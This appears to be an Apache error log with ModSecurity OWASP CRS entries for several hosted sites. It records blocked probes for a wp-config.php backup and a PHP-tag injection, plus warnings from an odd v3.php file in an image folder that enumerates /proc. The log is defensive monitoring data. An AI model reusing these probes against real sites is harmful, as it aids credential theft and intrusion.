[Mon May 11 19:49:34.707266 2026] [security2:error] [pid 1501883:tid 1501901] [client 34.231.118.144:40392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIWrjP5Q_-MBliRCAxRLgAAABA"]
[Mon May 11 19:49:34.799906 2026] [security2:error] [pid 1501883:tid 1501901] [client 34.231.118.144:40392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIWrjP5Q_-MBliRCAxRLgAAABA"]
[Mon May 11 19:49:40.907101 2026] [:error] [pid 1511173:tid 1511177] [client 35.86.35.24:44642] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 19:50:08.105057 2026] [ssl:error] [pid 1501831:tid 1501849] (EAI 2)Name or service not known: [client 66.132.172.212:22330] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:50:08.105684 2026] [ssl:error] [pid 1501831:tid 1501849] AH01941: stapling_renew_response: responder error
[Mon May 11 19:50:17.622027 2026] [ssl:error] [pid 1516058:tid 1516101] (EAI 2)Name or service not known: [client 66.132.172.212:49646] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:50:17.622063 2026] [ssl:error] [pid 1516058:tid 1516101] AH01941: stapling_renew_response: responder error
[Mon May 11 19:50:28.760256 2026] [ssl:error] [pid 1511173:tid 1511199] (EAI 2)Name or service not known: [client 66.132.172.212:14268] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:50:28.760304 2026] [ssl:error] [pid 1511173:tid 1511199] AH01941: stapling_renew_response: responder error
[Mon May 11 19:50:30.731882 2026] [ssl:error] [pid 1502013:tid 1502048] (EAI 2)Name or service not known: [client 66.132.172.212:14308] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:50:30.731932 2026] [ssl:error] [pid 1502013:tid 1502048] AH01941: stapling_renew_response: responder error
[Mon May 11 19:51:16.937657 2026] [security2:error] [pid 1502013:tid 1502037] [client 43.134.51.171:58566] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/accueil/feed/"] [unique_id "agIXFJYn-x0CHsbEbP2XPQAAAIo"]
PHP Warning:  filesize(): stat failed for /proc/24/task/24/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/24/task/24/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/24/task/24/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/24/task/24/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/24/task/24/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/24/task/24/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:51:27.985623 2026] [security2:error] [pid 1501831:tid 1501851] [client 43.130.39.254:34118] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIXH1NddpkriGUb6ZVgzwAAARI"]
[Mon May 11 19:51:38.647717 2026] [security2:error] [pid 1502013:tid 1502060] [client 170.106.181.163:43126] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nouveau-visuel-flb/"] [unique_id "agIXKpYn-x0CHsbEbP2XZQAAAJM"]
[Mon May 11 19:51:40.081554 2026] [:error] [pid 1501883:tid 1501909] [client 3.131.220.121:59272] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:51:50.410629 2026] [security2:error] [pid 1511173:tid 1511190] [client 43.130.3.120:53174] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIXNvjVc-A-CSptvm1dRAAAAE4"]
[Mon May 11 19:51:53.004622 2026] [:error] [pid 1501883:tid 1501901] [client 3.131.220.121:45464] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:52:26.077218 2026] [security2:error] [pid 1516058:tid 1516107] [client 170.106.11.141:44158] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agIXWiMeXtzav-mi9SybaAAAANE"]
[Mon May 11 19:53:13.303641 2026] [security2:error] [pid 1516058:tid 1516113] [client 175.178.110.121:34024] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agIXiSMeXtzav-mi9SybpgAAANc"]
[Mon May 11 19:53:30.346682 2026] [core:error] [pid 1501883:tid 1501902] [client 172.212.217.10:61641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:30.347216 2026] [core:error] [pid 1501883:tid 1501902] [client 172.212.217.10:61641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:31.300878 2026] [core:error] [pid 1511173:tid 1511184] [client 172.212.217.10:36730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:31.300923 2026] [core:error] [pid 1511173:tid 1511184] [client 172.212.217.10:36730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:33.353106 2026] [core:error] [pid 1501883:tid 1501894] [client 172.212.217.10:37492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:33.353175 2026] [core:error] [pid 1501883:tid 1501894] [client 172.212.217.10:37492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:35.111794 2026] [core:error] [pid 1516058:tid 1516100] [client 172.212.217.10:37478] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:35.111837 2026] [core:error] [pid 1516058:tid 1516100] [client 172.212.217.10:37478] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:35.950493 2026] [core:error] [pid 1501883:tid 1501905] [client 172.212.217.10:24457] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:35.950526 2026] [core:error] [pid 1501883:tid 1501905] [client 172.212.217.10:24457] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:38.223691 2026] [security2:error] [pid 1501883:tid 1501901] [client 129.226.94.52:40646] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/wp-content/uploads/2023/04/cropped-Logo_TCT-PRO_fond-blanc-180x180.webp"] [unique_id "agIXojP5Q_-MBliRCAxS9wAAABA"]
[Mon May 11 19:53:39.820578 2026] [core:error] [pid 1511173:tid 1511198] [client 172.212.217.10:62857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:39.820694 2026] [core:error] [pid 1511173:tid 1511198] [client 172.212.217.10:62857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:41.512785 2026] [core:error] [pid 1516058:tid 1516092] [client 172.212.217.10:1951] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:41.512819 2026] [core:error] [pid 1516058:tid 1516092] [client 172.212.217.10:1951] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:43.903827 2026] [core:error] [pid 1501883:tid 1501904] [client 172.212.217.10:62871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:43.903856 2026] [core:error] [pid 1501883:tid 1501904] [client 172.212.217.10:62871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:46.884669 2026] [core:error] [pid 1502013:tid 1502030] [client 172.212.217.10:62868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:46.884704 2026] [core:error] [pid 1502013:tid 1502030] [client 172.212.217.10:62868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:49.032909 2026] [core:error] [pid 1502013:tid 1502034] [client 172.212.217.10:1922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:49.032934 2026] [core:error] [pid 1502013:tid 1502034] [client 172.212.217.10:1922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:51.616439 2026] [core:error] [pid 1502013:tid 1502044] [client 172.212.217.10:1928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:51.616470 2026] [core:error] [pid 1502013:tid 1502044] [client 172.212.217.10:1928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:53.140304 2026] [core:error] [pid 1511173:tid 1511181] [client 172.212.217.10:37472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:53.140334 2026] [core:error] [pid 1511173:tid 1511181] [client 172.212.217.10:37472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:55.166989 2026] [core:error] [pid 1501883:tid 1501903] [client 172.212.217.10:62885] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:55.167028 2026] [core:error] [pid 1501883:tid 1501903] [client 172.212.217.10:62885] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:57.253986 2026] [security2:error] [pid 1516058:tid 1516095] [client 43.165.65.117:50382] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/confidentialite.html"] [unique_id "agIXtSMeXtzav-mi9Syb6AAAAMU"]
[Mon May 11 19:53:57.621861 2026] [security2:error] [pid 1501831:tid 1501853] [client 172.212.217.10:61633] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wp-config.php.backup"] [unique_id "agIXtVNddpkriGUb6ZVhuQAAARQ"]
[Mon May 11 19:53:57.622029 2026] [security2:error] [pid 1501831:tid 1501853] [client 172.212.217.10:61633] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wp-config.php.backup"] [unique_id "agIXtVNddpkriGUb6ZVhuQAAARQ"]
[Mon May 11 19:53:57.622740 2026] [core:error] [pid 1501831:tid 1501853] [client 172.212.217.10:61633] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:53:57.623070 2026] [security2:error] [pid 1501831:tid 1501853] [client 172.212.217.10:61633] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wp-config.php.backup"] [unique_id "agIXtVNddpkriGUb6ZVhuQAAARQ"]
[Mon May 11 19:54:02.252038 2026] [core:error] [pid 1501883:tid 1501909] [client 172.212.217.10:16189] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:02.252072 2026] [core:error] [pid 1501883:tid 1501909] [client 172.212.217.10:16189] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:05.280162 2026] [core:error] [pid 1502013:tid 1502046] [client 172.212.217.10:36712] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:05.283187 2026] [core:error] [pid 1502013:tid 1502046] [client 172.212.217.10:36712] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:10.004914 2026] [core:error] [pid 1511173:tid 1511184] [client 172.212.217.10:36727] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:10.004951 2026] [core:error] [pid 1511173:tid 1511184] [client 172.212.217.10:36727] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:11.506372 2026] [core:error] [pid 1501831:tid 1501840] [client 172.212.217.10:24499] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:11.506397 2026] [core:error] [pid 1501831:tid 1501840] [client 172.212.217.10:24499] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:12.214763 2026] [security2:error] [pid 1511173:tid 1511177] [client 43.128.87.4:51500] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agIXxPjVc-A-CSptvm1eEgAAAEE"]
[Mon May 11 19:54:12.715465 2026] [core:error] [pid 1502013:tid 1502047] [client 172.212.217.10:24448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:12.715493 2026] [core:error] [pid 1502013:tid 1502047] [client 172.212.217.10:24448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:14.198323 2026] [core:error] [pid 1511173:tid 1511193] [client 172.212.217.10:36687] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:14.198363 2026] [core:error] [pid 1511173:tid 1511193] [client 172.212.217.10:36687] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:15.105839 2026] [core:error] [pid 1502013:tid 1502035] [client 172.212.217.10:62877] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:15.105871 2026] [core:error] [pid 1502013:tid 1502035] [client 172.212.217.10:62877] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:16.085415 2026] [core:error] [pid 1502013:tid 1502033] [client 172.212.217.10:36711] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:16.085441 2026] [core:error] [pid 1502013:tid 1502033] [client 172.212.217.10:36711] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:17.715754 2026] [core:error] [pid 1511173:tid 1511197] [client 172.212.217.10:16171] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:17.715788 2026] [core:error] [pid 1511173:tid 1511197] [client 172.212.217.10:16171] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:18.595943 2026] [core:error] [pid 1501831:tid 1501849] [client 172.212.217.10:1921] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:18.595974 2026] [core:error] [pid 1501831:tid 1501849] [client 172.212.217.10:1921] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:19.273031 2026] [core:error] [pid 1501883:tid 1501897] [client 172.212.217.10:1980] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:19.273061 2026] [core:error] [pid 1501883:tid 1501897] [client 172.212.217.10:1980] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:20.129593 2026] [core:error] [pid 1511173:tid 1511198] [client 172.212.217.10:16169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:20.129629 2026] [core:error] [pid 1511173:tid 1511198] [client 172.212.217.10:16169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:22.393291 2026] [core:error] [pid 1501831:tid 1501839] [client 172.212.217.10:62864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:22.393331 2026] [core:error] [pid 1501831:tid 1501839] [client 172.212.217.10:62864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:28.231508 2026] [core:error] [pid 1516058:tid 1516107] [client 172.212.217.10:1974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:28.231554 2026] [core:error] [pid 1516058:tid 1516107] [client 172.212.217.10:1974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:29.532865 2026] [core:error] [pid 1502013:tid 1502047] [client 172.212.217.10:62873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:29.532893 2026] [core:error] [pid 1502013:tid 1502047] [client 172.212.217.10:62873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
